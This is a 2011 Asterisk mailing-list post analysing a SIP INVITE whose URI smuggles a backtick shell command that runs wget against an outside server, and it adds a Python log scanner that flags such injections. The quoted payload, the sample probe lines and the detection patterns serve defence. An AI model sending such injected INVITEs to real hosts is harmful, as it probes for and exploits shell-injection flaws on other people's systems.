[asterisk-users] new sort of shell attack attempt via SIP?

Tom Browning ttbrowning at gmail.com
Sun Sep 11 18:35:58 CDT 2011


I disagree with the 'review CDR' angle for a number of reasons:

a) there is a backtick in the URI trying to force shell and the proper
wget command line to send results to /dev/null
b) the V.php (at the url) appears to do nothing at all and might just
be empty (for log scraping), url safety checks confirm
c) the invites were sprayed across my entire IP address range

To me, this is more like a scan for any SIP host that has a shell
injection vulnerability.  The list of vulnerable hosts is just a log
scrape away at the server 91.223.89.94.
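As an added illustration of the scan-detection angle (this is not code from the thread, from Asterisk or from FreePBX): a Python check that parses logged INVITE request lines, isolates the user part of the Request-URI, and flags shell metacharacters and embedded URLs. The sample lines are constructed from the INVITE quoted below; x.x.x.x stands in for the redacted target and the $(id) line is a further constructed probe.

```python
import re
from dataclasses import dataclass

# Constructed sample lines modelled on the INVITE quoted in this thread: the
# server is the one named on the list, x.x.x.x is the poster's own redacted
# host, and the $(id) probe is a further constructed variant.
SAMPLE_LINES = [
    "INVITE sip:00123456789000`wget\\x20-O\\x20/dev/null\\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0",
    "INVITE sip:2125551234@x.x.x.x SIP/2.0",
    "INVITE sip:$(id)@x.x.x.x SIP/2.0",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<uri>sips?:\S+)\s+SIP/2\.0")
SHELL_META = re.compile(r"`|\$\(|\$\{|[;|&]")   # backticks, $( ), ${ }, separators
EMBEDDED_URL = re.compile(r"https?://[^\s`'\"]+")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")  # \x20 as written in the logged URI

@dataclass
class Finding:
    method: str
    host: str
    user: str          # user part exactly as logged
    decoded_user: str  # with \xHH escapes turned back into characters
    metachars: list
    urls: list

def split_uri(uri):
    # Split at the LAST '@' so an '@' smuggled into the user part cannot
    # disguise the real host; drop ;transport= and other URI parameters.
    user, _, hostpart = uri.split(":", 1)[1].rpartition("@")
    return user, hostpart.split(";", 1)[0]

def inspect(line):
    """Return a Finding if the Request-URI's user part carries shell
    metacharacters or an embedded URL, else None (also for non-request lines)."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    user, host = split_uri(m.group("uri"))
    decoded = HEX_ESCAPE.sub(lambda e: chr(int(e.group(1), 16)), user)
    metas = sorted(set(SHELL_META.findall(decoded)))
    urls = EMBEDDED_URL.findall(decoded)
    if not metas and not urls:
        return None
    return Finding(m.group("method"), host, user, decoded, metas, urls)

def scan(lines):
    return [f for f in map(inspect, lines) if f is not None]

FINDINGS = scan(SAMPLE_LINES)  # two hits: the backtick INVITE and the $(id) probe
```

Feed it the request lines from your SIP logs or a pcap export; the decoded user part shows an analyst the command as the attacker intended it to read.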



On Sun, Sep 11, 2011 at 7:20 PM, Alex Balashov
<abalashov at evaristesys.com> wrote:
> On 09/11/2011 07:05 PM, Tom Browning wrote:
>
>> INVITE
>> sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
>> SIP/2.0.
>
> My guess is that this attack presumes you are running a web GUI such as
> FreePBX, and that it does not sanitise embedded HTML.  Thus, when reviewing
> your CDRs, for instance, you might click on such a link.
>
> A more sophisticated variant of that would embed <script> tags with a
> shortened URL (overall small enough to fit inside a SIP display name field
> or whatnot) to effectuate a cross-site scripting attack.
>
> --
> Alex Balashov - Principal
> Evariste Systems LLC
> 260 Peachtree Street NW
> Suite 2200
> Atlanta, GA 30303
> Tel: +1-678-954-0670
> Fax: +1-404-961-1892
> Web: http://www.evaristesys.com/
>


